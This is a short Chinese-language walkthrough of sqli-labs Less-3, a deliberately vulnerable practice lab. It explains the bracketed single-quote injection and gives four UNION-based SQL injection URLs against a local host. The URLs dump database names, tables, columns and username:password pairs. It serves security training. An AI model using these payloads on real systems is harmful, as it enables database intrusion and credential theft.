今天我們來講解 sqli-libs(3)
有括號的單引號報錯 首先我們來查看加入'看報錯了 在加‘’ 沒報錯 證明 存在注入
然后我們看加入’的報錯回顯的是什么
和我們的sqli-libs(1)的報錯對比一下
發現多了一個)證明他的語句變成了 id=那我們可以根據此特性構造閉合語句
我們查看源代碼 發現確實是多了 括號的 我們此時在構造id=1')閉合前面的括號和引號 而后面的直接用%23閉合就行了
了解了語句構造方法后 我們開始執行我們的命令了
0x01爆數據庫名稱 和當前數據庫
http://127.0.0.1/sql1/Less-3/?id=-1%27)%20union%20select%20null,null,(select%20group_concat(schema_name)%20from%20information_schema.schemata)%23
這里我們知道我們的當前數據庫所以就不進行爆破了
0x02爆表名
http://127.0.0.1/sql1/Less-3/?id=-1%27)%20union%20select%20null,null,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)%23
0x03爆列名
http://127.0.0.1/sql1/Less-3/?id=-1%27)%20union%20select%20null,null,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)%23
0x04爆字段名
http://127.0.0.1/sql1/Less-3/?id=-1%27)%20union%20select%20null,null,group_concat(username,0x3a,password)%20from%20users%23
其實在sql前面的關卡 只要你找到繞過思路 后面那些語句都是一樣的 所以主要是思路
切記 少就是多 慢就是快